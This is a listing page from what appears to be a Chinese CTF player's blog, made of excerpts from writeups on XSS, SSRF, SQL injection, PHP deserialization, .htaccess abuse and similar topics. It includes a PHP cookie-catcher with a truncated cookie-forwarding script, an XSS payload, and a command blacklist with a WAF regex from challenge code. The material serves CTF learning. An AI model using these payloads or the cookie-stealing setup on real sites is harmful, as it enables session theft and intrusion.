- 博客(85)
- 收藏
- 关注
RSS订阅原创 day3 -- 读两篇文章
https://zhuanlan.zhihu.com/p/44121378https://zhuanlan.zhihu.com/p/98855346
2022-02-24 20:34:43
223
原创 数据结构作业-素数区间
文章目录素数区间知识点欧拉筛素数区间★实验任务dark di在做数学题目的时候发现了一个现象,2个相邻的素数之间存在一个区间,他把这个区间称为非素数区间,那么dark di想知道,给定一个正整数x,x所在的非素数区间长度是多少呢? 例如23和29是2个相邻的素数,他们之间的非素数区间是[24,28],长度是5,假设x=27,那么x所在的非素数区间长度就是5。如果x是一个素数,则答案是0。注意:素数指的是除了1和它本身以外不再有其他因数的自然数。★输入格式 第一行输入一个正整数T,表示接下去有T次
2021-10-05 09:12:28
526
原创 RCTF-misc-coocat wp
coolcat writeupI am honored to give a misc challenge for RCTF( forgive me for my poor english plzThe challenge comes from an article
2021-09-15 23:10:00
539
原创 docker bug
DNS解析问题在虚拟机中 docker 无法访问外网问题vim /etc/docker/deamon.sjon加上{"dns":['8.8.8.8':'8.8.4.4']}
2021-09-08 00:05:40
79
原创 phpstudy+xdebug+phpstorm 进行调试
文章目录写在前面phpstudyxdebug helperphpstorm写在前面最近一段时间都在搞代码审计 但审计环境的配置一直困扰着我 所以这里记录一下我的环境搭建过程phpstudy首先我们配置phpstudy 在php版本配置的拓展中找的 xdebug 选中然后去对应版本的 ini 里修改配置[Xdebug]zend_extension=E:/phpstudy/phpstudy_pro/Extensions/php/php5.6.9nts/ext/php_xdebug.dllxde
2021-09-03 19:54:08
267
原创 xman 8-16晚自习解题记录
singin第一题直接给了源码<?phpshow_source(__FILE__);$dir = './sandbox/'.md5($_SERVER['REMOTE_ADDR']);echo $dir;echo "<br>";is_dir($dir) ?: mkdir($dir);$line = $_GET['a'];class B { public $content; public $filename; function __destruct()
2021-09-01 18:29:18
111
原创 BSides Noida CTF
写在前面由于前几天看了一下RaCTF 加上这几天在摸鱼 导致这个比赛一直没看 现在比赛结束了 没事来做做题Baby Web好久没做php 都有点想念了Just a place to see list of all challs from bsides noida CTF, maybe some flag too xDNote : Bruteforce is not required.<?phpini_set('display_errors', 1);ini_set('displa
2021-08-12 16:44:11
299
原创 CyBBICS CTF(wp + 复现)
Ad Network (Web, Baby, 500 pts)We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules.There is a flag 1337 redirects deep into the network…我们厌倦了在互联网上做广告。感觉就像它打破了互联网。尝试遵循广告,尝试遵
2021-07-29 14:07:02
5242
原创 hackme2靶场刷题记录
写在前面最近看到貌似有些靶机挺好玩的 下了个靶机来玩一下nmap扫一下端口扫到了 直接进入渗透开始!猜测 search 有sql注入sqlmap简单梭以下 没啥反应。。。回到登录框 看看这边有没有什么搞头直接bp扫描器一开直接扫出了一个xss是我没想到的payloadusername=admint807c%22%3e%3cscript%3ealert(1)%3c%2fscript%3eoqu8p&password=password<!DOCTYPE html&g
2021-07-28 01:02:27
477
原创 Http请求走私
前言在2016年的DEF CON 24上 @regilero 发布了名为Hiding Wookiees in HTTP 的报告视频连接前段时间做题正好遇到了http请求走私 这里便总结一下http走私原理在HTTP 1.0及其以前版本的协议中,在每次进行交互的时候,C/S两端都需要进行TCP的三次握手链接。而如今的web页面大部分主要还是由大量静态资源所组成。如果依然按照HTTP 1.0及其以前版本的协议设计,会导致服务器大量的负载被浪费。于是在HTTP 1.1中,增加了Keep-Alive、Pi
2021-07-21 16:44:47
125
原创 ctfshow XSS刷题总结
简介这次把爪牙伸到了xss 嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.php<?php$content = $_GET[1];if(isset($content)){ file_put_contents('XSS/flag.txt',$content);}else{ echo 'no date input';}下边拿到后直接把cookie转发<script>docum
2021-07-21 16:44:16
1060
原创 MySQL 服务端恶意读取客户端任意文件漏洞复现
写在前面看到一篇文章讲利用mysql服务器恶意读取客户端文件的文章 拿来复现一下利用语句LOAD DATA INFILELOAD DATA INFILE语句用于高速地从一个文本文件中读取行,并写入一个表中。文件名称必须为一个文字字符串。LOAD DATA INFILE 是 SELECT … INTO OUTFILE 的相对语句。把表的数据备份到文件使用SELECT… INTO OUTFILE ,从备份文件恢复表数据,使用 LOAD DATA INFILE 。原理该漏洞的核心原理在于My
2021-07-21 16:43:25
874
原创 工业安全CTF
10.Modbus采样分析安全巡检工程师会对控制设备运行情况进行检测分析,某日突然在流量中发现攻击者截取了工程师站采集数据的命令,并将采集命令进行了恶意篡改,导致上层无法获取设备正确的运行信息,影响企业正常生产运行,请分析出被篡改的恶意采集数据报文,获取flag。flag格式为:flag{}直接wireshark 拿出来 硬看要找出 采集数据的命令4.图片隐写题binwallk和 fromost跑了一下 什么都没出拿到 010editor里看一下看不懂6.OPC协议分析筛选出DCERP
2021-07-21 16:39:45
1218
原创 sqlmap使用再学习
可测试参数选项:-p,--skip 和 --param-exclude默认情况下 sqlmap 会测试所有 GET 参数和 POST 参数。当 --level 的值 >= 2,它还会测试 HTTP Cookie 头部值。当这个值 >= 3 时,它还会测试 HTTP User-Agent 和 HTTP Referer 头部值。而且还可以手动指定一个需要 sqlmap 进行测试的、使用逗号分隔的参数列表。这会使 sqlmap 忽略 --level 的设置。例如,只需要测试 GET 参数 id
2021-07-21 16:39:15
173
原创 portswigger CORS
写在前面最近忙于复现比赛 今天来学点新知识昨天做ctfshow的 cms 时 了解到了 有 Flash 的一个洞 和 cors 有关今天来深入学习一下和cors有关的知识start什么是CORS?跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。CORS 不是针对跨站请求伪造(CSRF)等跨源攻击的保护措施。Same-ori
2021-07-21 16:36:05
599
原创 TyphoonCon CTF
Impasse这是僵局/绝境的意思。。。看一下页面源码error_reporting(0);if (isset($_GET['print'])) { if (!empty($_GET['print'])){ $printValue= strtolower($_GET['print']); $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject"
2021-07-20 11:54:55
493
原创 linux 命令总结
文章目录查看端口占用lsofnetstatkillsystemdsystemstl常用命令查看版本管理服务列举已经启动的 unit展示 unit 文件 和 状态查看为 service 的服务定时任务守护进程什么是守护进程?前台任务与后台任务 frp穿透查看端口占用lsof展示所有lsof -i显示特定端口lsof -i:7000netstatnetstat -tunlp 用于显示 tcp,udp 的端口和进程等相关情况。netstat 查看端口占用语法格式:netstat -tu
2021-07-16 18:30:16
383
2
原创 PIL库学习(misc)+ 国赛Gif runningxxx
写在前面后天考python TCTF不敢打。。。正好python要考PIL库那我们就借此机会向CTF misc无限拓展。。。例子准备拿国赛那道gif题下手首先观察出 RGB 为 (233,233,233)现在要从所有的帧中找到 RGB 为 这个的点的位置。。。再拿来画图找到flag读文档从动画里提取帧from PIL import Image, ImageSequencewith Image.open("animation.fli") as im: index = 1
2021-07-03 21:51:25
282
原创 PHP session反序列化利用
前言整理session反序列化笔记php引擎不同导致反序列化漏洞1.存在输入的情况我们创建两个文件 并进行部署 1.php 和 2.php1.php使用 php_serialize 引擎<?phpini_set('session.serialize_handler', 'php_serialize');session_start();$_SESSION['run'] = $_GET['a'];var_dump($_SESSION);2.php使用php引擎<?ph
2021-06-28 22:32:51
130
3
原创 .htaccess 的利用实践
简介最近做文件上传题目时遇到了利用.htaccess文件进行rce的题目 正好今天刷freebuff时 又看到了一篇文章 这里就认真总结一下发现一个好玩的现象 freebuff搜索 .htaccess 的时候返回404 算是给过滤了?hh常规利用方式way1我在本地开了个环境试了一下.htaccess 写入AddType application/x-httpd-php .txt当访问1.txt时 就可以将1.txt当成php文件来执行way2将 .htaccess文件自身当成php
2021-06-28 22:32:29
260
1
原创 CISCN国赛线下AWD总结与反思
整体总结关于比赛实战起来和练习还是有很大的不同到了比赛一上来遇到了3台web 有点手忙脚乱的比赛是两个cms + 一个game由于没有经验 一时不知道从哪里入手或从哪里去打 导致对团队做出的贡献很小 有点遗憾所以要好好练一练代码审计 并且提高一下运维的技术?关于攻击和防御我们发现机器很快被上了马 于是决定把机全部宕掉我觉得上来备份完后可以手动宕机 然后慢慢修这里有个小问题就是 数据库的备份问题这次比赛没有很简单能够打数据库的洞 所以数据库没被打 并且我们第一天三个web一直宕机 导致没
2021-06-28 22:31:39
861
原创 工控流量分析题+wireshark学习
写在前面暑假报名了工控比赛 所以要找些工控的题目来刷刷 正好比赛方提供的靶场有很多类似的题目 开始痛苦的学习过程。。。WiresharkCapture filter<Protocol name> <Direction><Host(s)><Value><Logical operations><Expression>如何看带 <Logical operations>1.<Protocol name>&l
2021-06-28 22:30:45
14781
1
原创 图片隐写小学习
抄书了隐写分析方法感官分析特征分析统计分析通用分析感官分析优点:简单直观弱点:自动化程度若,可靠性弱特征分析基于文件结构的隐写特征1.文件大小异常2.调色板中有像素没有使用的颜色。。。软件特征2006年高清晰度DVD视频播放器面世时,使用了强度较高的加密算法。可仅仅六个月之后,系统就被驳接了,问题不是出在算法上,而是算法的实现,攻击者能从内存获取密钥隐写软件特征:隐写软件 TheThirdEye 的隐写标记: www.binary-techNologies.com
2021-06-28 22:29:23
423
原创 老八小超市儿
老八小超市儿复习期末考试中 忍住自己打ctf的强烈欲望正好快要21的GKCTF (挂科ctf) 把20年的拿来做一下 嘿嘿正文!首先确实拿到了一个小超市但是不知道洞在哪.。。由于buu的特性 (你懂的只能手撸了刚开始有点迷茫先看看搜索处是否有sql注入观察一下路由index.php?s=/index/goods/index/id/8.html...
2021-06-24 01:18:41
197
2
原创 红帽杯find_it
<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?><html><head> <title>Hello worldd!</title> <style> body { background-color: white; text-align: cent
2021-06-24 00:15:51
259
原创 羊城杯2020 Easyphp2
随便刷一刷 随便总结一下 随便涨点姿势二话不说先目录扫描 但是扫出来一堆429.。。。看了一下dirsearch的readme发现了以下参数-s DELAY, --delay=DELAY Delay between requestsemmm 真不错重新来!还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
2021-06-24 00:15:14
1140
3
原创 nmap学习使用
写在前面最近做到了网鼎杯nmap 这样一道题 卡住了正好一直想好好学一下nmap工具的使用 这里就好好总结一下关于端口常见操作指令扫描常用参数nmap -v ip 显示详细的扫描过程nmap -p ip 扫描指定端口nmap -A ip 全面扫描操作系统nmap -sP ip 进行ping扫描主机存活nmap -Pn/-P0 ip 禁ping扫描nmap -sS ip 进行tcp syn扫描 也叫半开放扫描nmap -sT ip 进行tcp连接扫描 (准确性高)常见的几
2021-06-24 00:13:27
384
1
原创 GKCTF2020 checkin
写在前面最近快期末考了 拼搏20天 我要上大二每天晚上会找时间刷一下CTF正片开始<title>Check_In</title><?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $thi
2021-06-23 23:40:26
333
原创 phar反序列化学习
phar反序列化什么是phar文件phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
2021-06-09 10:49:06
1371
原创 津门杯wp
hate_php<?phperror_reporting(0);if(!isset($_GET['code'])){ highlight_file(__FILE__);}else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code);}一道命令执行题目
2021-06-06 13:19:04
258
3
原创 由美团杯一道题学习sql注入新姿势
sql登陆界面很好看有很多的过滤space'"=-;没过率+,因为过滤了空格 所以base64就很烦?首先要考虑的便是'的过滤。。。很烦
2021-05-26 13:28:13
323
8
原创 sqlilabs less1-20
说明突然发现buuctf上可以直接做sqllibs 有点意思!最近开始刷sqllibs!!!备战网络安全大赛!!!争取过初赛!!!less1从第一题开始首先从最简单的入手?id=1'回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1'
2021-05-25 21:38:17
542
1
原创 ctfshow 文件包含
说明从零开始学 主要为了学知识web78<?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}php伪协议读取?file=php://filter/convert.base64-encode/resource=flag.phpphp://filter 读取源代码并进行base64编码输出,不然会直接当做php
2021-05-17 23:09:54
215
原创 EasyCalc学习字符串解析特性
字符串解析特性相关文章Easy Calc查看源码 提示要绕WAF进入 /calc.php 得到一段代码<?phperror_reporting(0);if(!isset($_GET['num'])){ show_source(__FILE__);}else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\'
2021-05-05 16:14:05
91
原创 ctfshow 命令执行
前面做的时候没总结从第40题开始总结web40<?phpif(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{
2021-05-05 16:12:15
548
原创 ctfshow SSRF刷题总结
web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);echo ($result);?>直接POST
2021-04-25 16:33:16
1120
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人